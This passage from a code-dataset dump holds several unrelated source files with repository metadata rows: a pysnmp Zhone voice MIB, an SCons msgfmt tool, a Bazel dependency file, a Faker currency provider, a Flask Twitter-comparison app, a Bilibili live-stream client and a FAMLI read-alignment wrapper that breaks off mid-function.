if mibBuilder.loadTexts: zhoneVaIfEMTimingDelayStart.setDescription('Minimum time to wait from outgoing seizure to out-dialing digits for delay start signaling. The default value of this object is 300 milliseconds. ')
zhoneVaIfEMTimingMaxDelayDuration = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 4, 3, 1, 9), Integer32().subtype(subtypeSpec=ValueRangeConstraint(100, 5000))).setUnits('milliseconds').setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfEMTimingMaxDelayDuration.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfEMTimingMaxDelayDuration.setDescription('Maximum time to wait from outgoing seizure to out-dialing digits. If the far end does not allow to send digits after the duration specified in the object, a reorder tone will be sent to the calling party. The default value of this object is 2000 milliseconds.')
zhoneVaIfEMTimingMinDelayPulseWidth = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 4, 3, 1, 10), Integer32().subtype(subtypeSpec=ConstraintsUnion(ValueRangeConstraint(0, 0), ValueRangeConstraint(140, 5000), ))).setUnits('milliseconds').setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfEMTimingMinDelayPulseWidth.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfEMTimingMinDelayPulseWidth.setDescription('Minimum delay-dial pulse duration for incoming call. If the value of this object is 0, then no delay-dial is sent to the far end for the incoming call. The default value of this object is 140 milliseconds.')
mibBuilder.exportSymbols("Zhone-VOICE-ANALOG-IF-MIB", zhoneVaIfFXSCfgSignalType=zhoneVaIfFXSCfgSignalType, zhoneVaIfFXOCfgDialType=zhoneVaIfFXOCfgDialType, zhonePotsRingRowStatus=zhonePotsRingRowStatus, zhoneVaIfCfgReceiveTLPNum=zhoneVaIfCfgReceiveTLPNum, zhoneVaIfCfgImpedance=zhoneVaIfCfgImpedance, zhonePotsRingEntry=zhonePotsRingEntry, zhoneVaIfFXOTimingInterDigitDuration=zhoneVaIfFXOTimingInterDigitDuration, zhoneVaIfEMTimingTable=zhoneVaIfEMTimingTable, zhoneVoiceAnalogIf_MIB=zhoneVoiceAnalogIf_MIB, zhonePotsRingTimer=zhonePotsRingTimer, zhoneVaIfFXOCfgSupDisconnect=zhoneVaIfFXOCfgSupDisconnect, zhoneVaIfEMTimingPulseInterDigitDuration=zhoneVaIfEMTimingPulseInterDigitDuration, zhoneVaIfEMCfgType=zhoneVaIfEMCfgType, zhoneVaIfEMCfgSignalType=zhoneVaIfEMCfgSignalType, zhoneVaIfFXOTimingEntry=zhoneVaIfFXOTimingEntry, zhoneVaIfEMCfgDialType=zhoneVaIfEMCfgDialType, zhoneVaIfEMTimingMaxDelayDuration=zhoneVaIfEMTimingMaxDelayDuration, zhoneVaIfEMTimingClearWaitDuration=zhoneVaIfEMTimingClearWaitDuration, zhoneVaIfFXSTimingDigitDuration=zhoneVaIfFXSTimingDigitDuration, zhoneVaIfFXSObjects=zhoneVaIfFXSObjects, zhoneVaIfFXOHookStatus=zhoneVaIfFXOHookStatus, zhoneVaIfEMTimingEntry=zhoneVaIfEMTimingEntry, zhoneVaIfEMCfgEntry=zhoneVaIfEMCfgEntry, zhoneVaIfEMStatusEntry=zhoneVaIfEMStatusEntry, zhoneVaIfCfgReceiveTLP=zhoneVaIfCfgReceiveTLP, zhoneVaIfFXOStatusEntry=zhoneVaIfFXOStatusEntry, zhoneVaIfStatusInfoType=zhoneVaIfStatusInfoType, zhoneVaIfCfgTransmitTLP=zhoneVaIfCfgTransmitTLP, zhoneVaIfStatusTable=zhoneVaIfStatusTable, zhoneVaIfGeneralObjects=zhoneVaIfGeneralObjects, zhoneVaIfFXSTimingInterDigitDuration=zhoneVaIfFXSTimingInterDigitDuration, zhoneVaIfCfgLoopCurrent=zhoneVaIfCfgLoopCurrent, zhoneVaIfEMCfgTable=zhoneVaIfEMCfgTable, zhoneVaIfFXSStatusTable=zhoneVaIfFXSStatusTable, zhoneVaIfCfgTrunkConditioning=zhoneVaIfCfgTrunkConditioning, zhoneVaIfCfgMaintenanceMode=zhoneVaIfCfgMaintenanceMode, zhoneVaIfEMOutSeizureActive=zhoneVaIfEMOutSeizureActive, zhoneVaIfCfgTable=zhoneVaIfCfgTable, zhoneVaIfFXOCfgNumberRings=zhoneVaIfFXOCfgNumberRings, zhoneVaIfFXSTimingTable=zhoneVaIfFXSTimingTable, zhoneVaIfFXOStatusTable=zhoneVaIfFXOStatusTable, zhoneVaIfEMObjects=zhoneVaIfEMObjects, zhonePotsRingTable=zhonePotsRingTable, zhoneVaIfStatusSignalErrors=zhoneVaIfStatusSignalErrors, zhoneVaIfFXSRingBack=zhoneVaIfFXSRingBack, zhoneVaIfEMStatusTable=zhoneVaIfEMStatusTable, zhoneVaIfFXOCfgSignalType=zhoneVaIfFXOCfgSignalType, zhoneVaIfFXORingGround=zhoneVaIfFXORingGround, PYSNMP_MODULE_ID=zhoneVoiceAnalogIf_MIB, zhoneVaIfObjects=zhoneVaIfObjects, zhoneVaIfFXSStatusEntry=zhoneVaIfFXSStatusEntry, zhoneVaIfFXORingDetect=zhoneVaIfFXORingDetect, zhoneVaIfEMTimingPulseRate=zhoneVaIfEMTimingPulseRate, zhoneVaIfFXSTipGround=zhoneVaIfFXSTipGround, zhoneVaIfFXOTimingPulseInterDigitDuration=zhoneVaIfFXOTimingPulseInterDigitDuration, zhoneVaIfCfgRingVoltage=zhoneVaIfCfgRingVoltage, zhoneVaIfEMTimingMaxWinkWaitDuration=zhoneVaIfEMTimingMaxWinkWaitDuration, zhoneVaIfFXOTimingDigitDuration=zhoneVaIfFXOTimingDigitDuration, zhoneVaIfCfgLineCapabilities=zhoneVaIfCfgLineCapabilities, zhoneVaIfFXSHookStatus=zhoneVaIfFXSHookStatus, zhoneVaIfEMTimingInterDigitDuration=zhoneVaIfEMTimingInterDigitDuration, zhoneVaIfFXSRingActive=zhoneVaIfFXSRingActive, zhoneVaIfCfgLineType=zhoneVaIfCfgLineType, zhoneVaIfFXOCfgEntry=zhoneVaIfFXOCfgEntry, zhoneVaIfEMTimingDigitDuration=zhoneVaIfEMTimingDigitDuration, zhoneVaIfEMTimingMaxWinkDuration=zhoneVaIfEMTimingMaxWinkDuration, zhoneVaIfEMCfgOperation=zhoneVaIfEMCfgOperation, zhoneVaIfFXSRingGround=zhoneVaIfFXSRingGround, zhoneVaIfFXOObjects=zhoneVaIfFXOObjects, zhoneVaIfCfgTransmitTLPNum=zhoneVaIfCfgTransmitTLPNum, zhoneVaIfFXSTimingEntry=zhoneVaIfFXSTimingEntry, zhonePotsRingIfIndex=zhonePotsRingIfIndex, zhoneVaIfCfgPCMEncoding=zhoneVaIfCfgPCMEncoding, zhonePotsRingRingingCadence=zhonePotsRingRingingCadence, zhoneVaIfEMInSeizureActive=zhoneVaIfEMInSeizureActive, zhoneVaIfEMTimingDelayStart=zhoneVaIfEMTimingDelayStart, zhoneVaIfCfgIntegratedDSP=zhoneVaIfCfgIntegratedDSP, zhoneVaIfFXOCfgTable=zhoneVaIfFXOCfgTable, zhoneVaIfCfgEntry=zhoneVaIfCfgEntry, zhoneVaIfFXSCfgEntry=zhoneVaIfFXSCfgEntry, zhoneVaIfFXSRingFrequency=zhoneVaIfFXSRingFrequency, zhoneVaIfFXSCfgTable=zhoneVaIfFXSCfgTable, zhoneVaIfFXOTimingPulseRate=zhoneVaIfFXOTimingPulseRate, zhoneVaIfEMTimingMinDelayPulseWidth=zhoneVaIfEMTimingMinDelayPulseWidth, zhoneVaIfFXOTimingTable=zhoneVaIfFXOTimingTable, zhoneVaIfStatusEntry=zhoneVaIfStatusEntry, zhoneVaIfFXOTipGround=zhoneVaIfFXOTipGround)
| 186.756944
| 4,522
| 0.783773
|
84d3becf658cef2d01c5c865af4daf00bf09b779
| 4,389
|
py
|
Python
|
engine/SCons/Tool/msgfmt.py
|
unix1986/scons
|
2137aa513182619fe50fcb89a248aafbfacf5653
|
[
"MIT"
] | 9
|
2016-05-10T01:51:28.000Z
|
2022-03-18T10:14:32.000Z
|
engine/SCons/Tool/msgfmt.py
|
unix1986/scons
|
2137aa513182619fe50fcb89a248aafbfacf5653
|
[
"MIT"
] | 1
|
2016-05-10T17:00:54.000Z
|
2016-05-10T19:33:11.000Z
|
engine/SCons/Tool/msgfmt.py
|
unix1986/scons
|
2137aa513182619fe50fcb89a248aafbfacf5653
|
[
"MIT"
] | 3
|
2015-05-15T19:54:57.000Z
|
2021-04-12T15:25:56.000Z
|
""" msgfmt tool """
# Copyright (c) 2001 - 2014 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
__revision__ = "src/engine/SCons/Tool/msgfmt.py 2014/09/27 12:51:43 garyo"
from SCons.Builder import BuilderBase
#############################################################################
class _MOFileBuilder(BuilderBase):
""" The builder class for `MO` files.
The reason for this builder to exists and its purpose is quite simillar
as for `_POFileBuilder`. This time, we extend list of sources, not targets,
and call `BuilderBase._execute()` only once (as we assume single-target
here).
"""
def _execute(self, env, target, source, *args, **kw):
# Here we add support for 'LINGUAS_FILE' keyword. Emitter is not suitable
# in this case, as it is called too late (after multiple sources
# are handled single_source builder.
import SCons.Util
from SCons.Tool.GettextCommon import _read_linguas_from_files
linguas_files = None
if env.has_key('LINGUAS_FILE') and env['LINGUAS_FILE'] is not None:
linguas_files = env['LINGUAS_FILE']
# This should prevent from endless recursion.
env['LINGUAS_FILE'] = None
# We read only languages. Suffixes shall be added automatically.
linguas = _read_linguas_from_files(env, linguas_files)
if SCons.Util.is_List(source):
source.extend(linguas)
elif source is not None:
source = [source] + linguas
else:
source = linguas
result = BuilderBase._execute(self,env,target,source,*args, **kw)
if linguas_files is not None:
env['LINGUAS_FILE'] = linguas_files
return result
#############################################################################
#############################################################################
def _create_mo_file_builder(env, **kw):
""" Create builder object for `MOFiles` builder """
import SCons.Action
# FIXME: What factory use for source? Ours or their?
kw['action'] = SCons.Action.Action('$MSGFMTCOM','$MSGFMTCOMSTR')
kw['suffix'] = '$MOSUFFIX'
kw['src_suffix'] = '$POSUFFIX'
kw['src_builder'] = '_POUpdateBuilder'
kw['single_source'] = True
return _MOFileBuilder(**kw)
#############################################################################
#############################################################################
def generate(env,**kw):
""" Generate `msgfmt` tool """
import SCons.Util
from SCons.Tool.GettextCommon import _detect_msgfmt
try:
env['MSGFMT'] = _detect_msgfmt(env)
except:
env['MSGFMT'] = 'msgfmt'
env.SetDefault(
MSGFMTFLAGS = [ SCons.Util.CLVar('-c') ],
MSGFMTCOM = '$MSGFMT $MSGFMTFLAGS -o $TARGET $SOURCE',
MSGFMTCOMSTR = '',
MOSUFFIX = ['.mo'],
POSUFFIX = ['.po']
)
env.Append( BUILDERS = { 'MOFiles' : _create_mo_file_builder(env) } )
#############################################################################
#############################################################################
def exists(env):
""" Check if the tool exists """
from SCons.Tool.GettextCommon import _msgfmt_exists
try:
return _msgfmt_exists(env)
except:
return False
#############################################################################
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| 40.266055
| 77
| 0.61039
|
56b34c6f2087e4c8b73c29d61e9341467c992b3b
| 721
|
bzl
|
Python
|
third_party/net_bytebuddy.bzl
|
wix/exodus
|
dfb0c9713b07a8b6a49b548b7b543021e748d80b
|
[
"MIT"
] | 186
|
2019-06-05T01:02:53.000Z
|
2022-03-31T10:44:19.000Z
|
third_party/net_bytebuddy.bzl
|
wix/exodus
|
dfb0c9713b07a8b6a49b548b7b543021e748d80b
|
[
"MIT"
] | 25
|
2019-06-04T23:18:55.000Z
|
2021-09-22T03:44:25.000Z
|
third_party/net_bytebuddy.bzl
|
wix/exodus
|
dfb0c9713b07a8b6a49b548b7b543021e748d80b
|
[
"MIT"
] | 17
|
2019-06-04T18:45:19.000Z
|
2022-01-20T09:40:04.000Z
|
load("//:import_external.bzl", import_external = "safe_wix_scala_maven_import_external")
def dependencies():
import_external(
name = "net_bytebuddy_byte_buddy",
artifact = "net.bytebuddy:byte-buddy:1.8.15",
artifact_sha256 = "af32e420b1252c1eedef6232bd46fadafc02e0c609e086efd57a64781107a039",
srcjar_sha256 = "c18794f50d1dfc8fb57bfd886b566b05697da396022bcd63b5463a454d33c899",
)
import_external(
name = "net_bytebuddy_byte_buddy_agent",
artifact = "net.bytebuddy:byte-buddy-agent:1.8.15",
artifact_sha256 = "ca741271f1dc60557dd455f4d1f0363e8840612f6f08b5641342d84c07f14703",
srcjar_sha256 = "8d42067e2111943eb8b873320a394d2ef760b88d7fc235942c01d384924d289c",
)
| 37.947368
| 91
| 0.78086
|
8dcb8043254041c3386b6c88079728ebcba592d2
| 316
|
py
|
Python
|
faker/providers/currency/fr_CA/__init__.py
|
mgorny/faker
|
b1176e01bf4d7f1aef408a4bb96a9e46188cc113
|
[
"MIT"
] | 12,077
|
2015-01-01T18:30:07.000Z
|
2022-03-31T23:22:01.000Z
|
faker/providers/currency/fr_CA/__init__.py
|
mgorny/faker
|
b1176e01bf4d7f1aef408a4bb96a9e46188cc113
|
[
"MIT"
] | 1,306
|
2015-01-03T05:18:55.000Z
|
2022-03-31T02:43:04.000Z
|
faker/providers/currency/fr_CA/__init__.py
|
mgorny/faker
|
b1176e01bf4d7f1aef408a4bb96a9e46188cc113
|
[
"MIT"
] | 1,855
|
2015-01-08T14:20:10.000Z
|
2022-03-25T17:23:32.000Z
|
from .. import Provider as CurrencyProvider
class Provider(CurrencyProvider):
price_formats = ["#,##", "%#,##", "%##,##", "%.###,##", "%#.###,##"]
def pricetag(self) -> str:
return (
self.numerify(self.random_element(self.price_formats))
+ "\N{no-break space}$"
)
| 24.307692
| 72
| 0.512658
|
ac07a6587842b386c7260ef75b4fd04acf7b7d1b
| 2,644
|
py
|
Python
|
sub_dir/app.py
|
DrewRust/Twitoff2
|
3740e2800615074d5560f5046c0105d989d34cd7
|
[
"MIT"
] | null | null | null |
sub_dir/app.py
|
DrewRust/Twitoff2
|
3740e2800615074d5560f5046c0105d989d34cd7
|
[
"MIT"
] | null | null | null |
sub_dir/app.py
|
DrewRust/Twitoff2
|
3740e2800615074d5560f5046c0105d989d34cd7
|
[
"MIT"
] | null | null | null |
#### ---> runs the app in the terminal:
#### FLASK_APP=twitoff_sub_dir:APP flask run
#### running flask shell will give you an interactive python environment
#### ---> how to interact with your database
#### FLASK_APP=twitoff_sub_dir:APP flask shell
#### creates an interactive shell
#### ---> then type: dir()
#### ---> then type: from twitoff_sub_dir.db_model import db, User, Tweet
#### now you have access to User and Tweet
#### ---> then type: db.init_app(app)
#### (above will associate db model with flask app)
#### ---> exit() gets you out of the shell env
#### db.create_all() will create the twitoff.sqlite
from flask import Flask, render_template, request
#### import User class
from .db_model import db, User
from .twitter import add_user_tweepy
from .predict import predict_user
#### where the initial app code will live
#### define function called create app
def create_app():
'''Create and configure an instance of the Flask application'''
app = Flask(__name__)
app.config["SQLALCHEMY_DATABASE_URI"] = "sqlite:////Users/andrewrust/Twitoff/twitoff_sub_dir/twitoff.sqlite"
app.config["SQLALCHEMY_TRACK_MODIFICATIONS"] = False
db.init_app(app)
@app.route('/')
def root():
#### render a template
return render_template('base.html', title='Home', users=User.query.all())
# return "Welcome to Twitoff!"
@app.route('/user', methods=['POST'])
@app.route('/user/<name>', methods=['GET'])
def user(name=None, message=''):
name = name or request.values['user_name']
try:
if request.method == 'POST':
add_user_tweepy(name)
message = "User {} successfully added!".format(name)
tweets = User.query.filter(User.username == name).one().tweet
except Exception as e:
message = "Error adding {}: {}".format(name, e)
tweets = []
return render_template('user.html', title=name, tweets=tweets, message=message)
@app.route('/compare', methods=['POST'])
def compare(message=''):
user1 = request.values['user1']
user2 = request.values['user2']
tweet_text = request.values['tweet_text']
if user1 == user2:
message = 'Cannot compare a user to themselves'
else:
prediction = predict_user(user1, user2, tweet_text)
message = '"{}" is more likely to be said by {} than {}'.format(
tweet_text, user1 if prediction else user2, user2 if prediction else user1
)
return render_template('prediction.html', title='Prediction', message=message)
return app
| 38.318841
| 112
| 0.638805
|
5c74c691d6193da6ec1a0af8cccf4865c4fc4b0e
| 4,851
|
py
|
Python
|
utils/blivex.py
|
liu246542/push2live
|
996d0bd71028ce1b2c97e896106cab9064fdf64e
|
[
"MIT"
] | null | null | null |
utils/blivex.py
|
liu246542/push2live
|
996d0bd71028ce1b2c97e896106cab9064fdf64e
|
[
"MIT"
] | null | null | null |
utils/blivex.py
|
liu246542/push2live
|
996d0bd71028ce1b2c97e896106cab9064fdf64e
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3.7
# -*- coding: utf-8 -*-
import requests
import time
class Bilibili:
def __init__(self):
self._session = requests.Session()
self.get_cookies = lambda: self._session.cookies.get_dict(domain=".bilibili.com")
self.get_uid = lambda: self.get_cookies().get("DedeUserID", "")
self.info = {
'ban': False,
'coins': 0,
'face': "",
'level': 0,
'nickname': "",
'room_id': "",
'live_status': False
}
self.headers = {
"accept": "application/json, text/plain, */*",
"accept-language": "zh-CN,zh;q=0.9,en;q=0.8,en-US;q=0.7",
"content-type": "application/x-www-form-urlencoded; charset=UTF-8",
"sec-fetch-dest": "empty",
"sec-fetch-mode": "cors",
"sec-fetch-site": "same-site",
"referrer": "https://link.bilibili.com/p/center/index",
"referrerPolicy": "no-referrer-when-downgrade"
}
@staticmethod
def _log(message):
print(f"[{time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))}] {message}")
def _requests(self, method, url, decode_level=2, retry=0, timeout=10, **kwargs):
if method in ["get", "post"]:
for _ in range(retry + 1):
try:
response = getattr(self._session, method)(url, timeout=timeout, **kwargs)
return response.json() if decode_level == 2 else response.content if decode_level == 1 else response
except:
pass
return None
# 使用 cookie 登陆
def login_with_cookie(self, fcookie):
import json
with open(fcookie) as f:
tempCookie = json.load(f)
for k in tempCookie.keys():
self._session.cookies.set(k, tempCookie[k], domain=".bilibili.com")
if self.get_user_info():
self._log("登录成功")
return True
return False
# 获取用户信息
def get_user_info(self):
url = f"https://api.bilibili.com/x/space/acc/info?mid={self.get_uid()}&jsonp=jsonp"
headers = {
'Host': "api.bilibili.com",
'Referer': f"https://space.bilibili.com/{self.get_uid()}/",
}
response = self._requests("get", url, headers=headers)
if response and response.get("code") == 0:
self.info['ban'] = bool(response['data']['silence'])
self.info['coins'] = response['data']['coins']
self.info['face'] = response['data']['face']
self.info['level'] = response['data']['level']
self.info['nickname'] = response['data']['name']
self.info['room_id'] = response['data']['live_room']['roomid']
self.info['live_status'] = bool(response['data']['live_room']['liveStatus'])
# self.room_info = self._requests("get", "https://api.live.bilibili.com/xlive/app-blink/v1/room/GetInfo?platform=pc").get("data")
self._log(f"{self.info['nickname']}(UID={self.get_uid()}), Lv.{self.info['level']}, 拥有{self.info['coins']}枚硬币, 账号{'状态正常' if not self.info['ban'] else '被封禁'}, 直播间ID={self.info['room_id']}, {'正在直播' if self.info['live_status'] else '停播状态'}")
return True
else:
self._log("用户信息获取失败")
return False
def start_live(self):
url = "https://api.live.bilibili.com/room/v1/Room/startLive"
payload = {
'room_id': self.info['room_id'],
'platform': 'pc',
'area_v2': 33, # 此处可以手动设置,如,33: 影音馆,376: 学习-人文社科
'csrf_token': self._session.cookies['bili_jct'],
'csrf': self._session.cookies['bili_jct'],
}
response = self._requests("post", url, data=payload, headers=self.headers).get("data")
self.rtmp_addr = response.get("rtmp").get("addr") + response.get("rtmp").get("code")
if not self.rtmp_addr:
self._log("开启直播间失败")
return False
self._log("开启直播间成功,串流地址为:" + self.rtmp_addr)
return True
def get_rtmp(self):
url = "https://api.live.bilibili.com/xlive/app-blink/v1/live/getWebUpStreamAddr?platform=pc"
response = self._requests("get", url).get("data").get("addr")
self.rtmp_addr = response.get("addr") + response.get("code")
return self.rtmp_addr
def stop_live(self):
url = "https://api.live.bilibili.com/room/v1/Room/stopLive"
payload = {
'room_id': self.info['room_id'],
'platform': 'pc',
'csrf_token': self._session.cookies['bili_jct'],
'csrf': self._session.cookies['bili_jct'],
}
response = self._requests("post", url, data=payload, headers=self.headers)
self._log("正在关闭直播间")
return True
| 42.552632
| 250
| 0.5537
|
fc71cbfb64a991b1f6ad593db3e2349014f254fd
| 15,143
|
py
|
Python
|
famli/run_famli.py
|
apaytuvi/FAMLI
|
b95f4e3b2be1d46b85d063f8d67f84e23377d73b
|
[
"MIT"
] | null | null | null |
famli/run_famli.py
|
apaytuvi/FAMLI
|
b95f4e3b2be1d46b85d063f8d67f84e23377d73b
|
[
"MIT"
] | null | null | null |
famli/run_famli.py
|
apaytuvi/FAMLI
|
b95f4e3b2be1d46b85d063f8d67f84e23377d73b
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
"""Wrapper script to run FAMLI on one or more FASTQ files."""
import os
import sys
import uuid
import time
import gzip
import json
import shutil
import logging
import argparse
from famli.exec_helpers import run_cmds
from famli.exec_helpers import align_reads
from famli.exec_helpers import return_results
from famli.exec_helpers import exit_and_clean_up
from famli.exec_helpers import get_reference_database
from famli.fastq_helpers import get_reads_from_url
from famli.fastq_helpers import set_up_sra_cache_folder
from famli.fastq_helpers import count_fastq_reads
from famli.fastq_helpers import combine_fastqs
from famli.famli_helpers import parse_alignment
class FAMLI:
def __init__(self):
parser = argparse.ArgumentParser(description="""
Two options for running FAMLI:
(1) Align a set of WGS reads - align against a reference database
with DIAMOND, process those alignments with FAMLI, and save the
results; or (2) Filter a set of existing alignments with FAMLI and
save the results.""")
parser.add_argument("command", help="""Command to run: align or filter. Invoke
famli.py <command> -h for further details""")
if len(sys.argv) < 2:
parser.print_help()
else:
args = parser.parse_args(sys.argv[1:2])
# Run the command that was specified
if args.command == "align":
self.align()
elif args.command == "filter":
self.filter()
else:
parser.print_help()
print("Unrecognized command")
def align(self):
"""Align a set of reads with DIAMOND and run FAMLI."""
parser = argparse.ArgumentParser(
description="""Align a set of reads with DIAMOND, filter alignments with FAMLI,
and return the results""")
parser.add_argument("--input",
type=str,
required=True,
help="""Location for input file(s). Combine multiple files with +.
(Supported: sra://, s3://, or ftp://).""")
parser.add_argument("--sample-name",
type=str,
required=True,
help="""Name of sample, sets output filename.""")
parser.add_argument("--ref-db",
type=str,
required=True,
help="""Folder containing reference database.
(Supported: s3://, ftp://, or local path).
""")
parser.add_argument("--output-folder",
type=str,
required=True,
help="""Folder to place results.
(Supported: s3://, or local path).""")
parser.add_argument("--min-score",
type=float,
default=20,
help="Minimum alignment score to report.")
parser.add_argument("--blocks",
type=int,
default=5,
help="""Number of blocks used when aligning.
Value relates to the amount of memory used.
Roughly 6Gb RAM used by DIAMOND per block.
""")
parser.add_argument("--query-gencode",
type=int,
default=11,
help="Genetic code used to translate nucleotides.")
parser.add_argument("--threads",
type=int,
default=16,
help="Number of threads to use aligning.")
parser.add_argument("--min-qual",
type=int,
default=None,
help="Trim reads to a minimum Q score.")
parser.add_argument("--temp-folder",
type=str,
default='/share',
help="Folder used for temporary files.")
parser.add_argument("--batchsize",
type=int,
help="""Number of reads to process at a time.""")
args = parser.parse_args(sys.argv[2:])
# Make sure that there are no commas or whitespaces in the input
input_str = args.input
assert ' ' not in input_str, input_str
assert ',' not in input_str, input_str
# Make a temporary folder for all files to be placed in
temp_folder = os.path.join(args.temp_folder, str(uuid.uuid4())[:8])
assert os.path.exists(temp_folder) is False
os.mkdir(temp_folder)
# Set up logging
log_fp = os.path.join(temp_folder, "log.txt")
logFormatter = logging.Formatter(
'%(asctime)s %(levelname)-8s [FAMLI] %(message)s'
)
rootLogger = logging.getLogger()
rootLogger.setLevel(logging.INFO)
# Write to file
fileHandler = logging.FileHandler(log_fp)
fileHandler.setFormatter(logFormatter)
rootLogger.addHandler(fileHandler)
# Also write to STDOUT
consoleHandler = logging.StreamHandler()
consoleHandler.setFormatter(logFormatter)
rootLogger.addHandler(consoleHandler)
# Check to see if DIAMOND is available
logging.info("Checking for a working copy of DIAMOND")
run_cmds(["diamond", "--version"])
# Get the reference database
try:
db_fp = get_reference_database(
args.ref_db,
temp_folder
)
except:
exit_and_clean_up(temp_folder)
# Set up the NCBI fastq-dump cache folder within the temp folder
set_up_sra_cache_folder(temp_folder)
logging.info("Reference database: " + db_fp)
# Align the input data and calculate the overall abundance
# Keep track of the time elapsed to process this sample
start_time = time.time()
logging.info("Processing input argument: " + input_str)
# Multiple input reads may be separated with a '+'
input_str = input_str.split("+")
# Make sure that they are all unique arguments
assert len(input_str) == len(set(input_str)), "Duplicate arguments"
# Make sure that the filenames are also all unique
assert len(input_str) == len(set([
s.split('/')[-1] for s in input_str
])), "Duplicate filenames"
# Capture each command in a try statement
# Get the input reads
read_fps = []
for s in input_str:
logging.info("Fetching {}".format(s))
try:
read_fps.append(get_reads_from_url(
s, temp_folder, min_qual=args.min_qual))
except:
exit_and_clean_up(temp_folder)
# Combine the files into a single FASTQ
read_fp = os.path.join(temp_folder, "input.fastq")
combine_fastqs(read_fps, read_fp)
# Run the alignment
try:
align_fp = align_reads(
read_fp, # FASTQ file path
db_fp, # Local path to DB
temp_folder, # Folder for results
query_gencode=args.query_gencode,
threads=args.threads,
min_score=args.min_score,
blocks=args.blocks,
)
except:
exit_and_clean_up(temp_folder)
# Process the alignments, reassigning multi-mapped reads
try:
with open(align_fp, "rt") as align_handle:
aligned_reads, abund = parse_alignment(
align_handle,
batchsize=args.batchsize,
)
except:
exit_and_clean_up(temp_folder)
# Calculate the number of deduplicated reads
deduplicated_reads = sum([d["nreads"] for d in abund])
# Name the output file based on the input file
# Ultimately adding ".json.gz" to the input file name
if args.sample_name is not None:
output_prefix = args.sample_name
else:
output_prefix = input_str[0].split("/")[-1]
logging.info("Using sample name {} for output prefix".format(
output_prefix))
# Count the total number of reads
logging.info("Counting the total number of reads")
n_reads = count_fastq_reads(read_fp)
logging.info("Reads in input file: {:,}".format(n_reads))
# Read in the logs
logging.info("Reading in the logs")
logs = open(log_fp, 'rt').readlines()
# Wrap up all of the results into a single JSON
# and write it to the output folder
output = {
"input_path": "+".join(input_str),
"input": output_prefix,
"sample": args.sample_name,
"output_folder": args.output_folder,
"logs": logs,
"ref_db": db_fp,
"ref_db_url": args.ref_db,
"results": abund,
"total_reads": n_reads,
"aligned_reads": aligned_reads,
"deduplicated_reads": deduplicated_reads,
"time_elapsed": time.time() - start_time,
"params": {
"batchsize": args.batchsize,
"min_score": args.min_score,
"blocks": args.blocks,
"query_gencode": args.query_gencode,
"threads": args.threads,
"min_qual": args.min_qual
}
}
return_results(
output, output_prefix, args.output_folder, temp_folder
)
# Delete any files that were created for this sample
logging.info("Removing temporary folder: " + temp_folder)
shutil.rmtree(temp_folder)
# Stop logging
logging.info("Done")
logging.shutdown()
def filter(self):
"""Filter a set of alignments with FAMLI."""
parser = argparse.ArgumentParser(
description="""Filter a set of existing alignments in tabular
format with FAMLI""")
parser.add_argument("--input",
type=str,
help="Location for input alignement file.")
parser.add_argument("--output",
type=str,
help="Location for output JSON file.")
parser.add_argument("--threads",
type=int,
help="""Number of processors to use.""",
default=4)
parser.add_argument("--logfile",
type=str,
help="""(Optional) Write log to this file.""")
parser.add_argument("--batchsize",
type=int,
help="""Number of reads to process at a time.""")
parser.add_argument("--qseqid-ix",
default=0,
type=int,
help="""Alignment column for query sequence ID.
(0-indexed column ix)""")
parser.add_argument("--sseqid-ix",
default=1,
type=int,
help="""Alignment column for subject sequence ID.
(0-indexed column ix)""")
parser.add_argument("--sstart-ix",
default=8,
type=int,
help="""Alignment column for subject start position.
(0-indexed column ix, 1-indexed start position)""")
parser.add_argument("--send-ix",
default=9,
type=int,
help="""Alignment column for subject end position.
(0-indexed column ix, 1-indexed end position)""")
parser.add_argument("--bitscore-ix",
default=11,
type=int,
help="""Alignment column for alignment bitscore.
(0-indexed column ix)""")
parser.add_argument("--slen-ix",
default=13,
type=int,
help="""Alignment column for subject length.
(0-indexed column ix)""")
parser.add_argument("--sd-mean-cutoff",
default=1.0,
type=float,
help="""Threshold for filtering max SD / MEAN""")
parser.add_argument("--strim-5",
default=18,
type=int,
help="""Amount to trim from 5' end of subject""")
parser.add_argument("--strim-3",
default=18,
type=int,
help="""Amount to trim from 3' end of subject""")
args = parser.parse_args(sys.argv[2:])
start_time = time.time()
assert os.path.exists(args.input)
# Set up logging
logFormatter = logging.Formatter(
'%(asctime)s %(levelname)-8s [FAMLI parse] %(message)s'
)
rootLogger = logging.getLogger()
rootLogger.setLevel(logging.INFO)
if args.logfile:
# Write to file
fileHandler = logging.FileHandler(args.logfile)
fileHandler.setFormatter(logFormatter)
rootLogger.addHandler(fileHandler)
# Write to STDOUT
consoleHandler = logging.StreamHandler()
consoleHandler.setFormatter(logFormatter)
rootLogger.addHandler(consoleHandler)
if args.input.endswith(".gz"):
f = gzip.open(args.input, "rt")
else:
f = open(args.input, "rt")
aligned_reads, output = parse_alignment(
f,
QSEQID_i=args.qseqid_ix,
SSEQID_i=args.sseqid_ix,
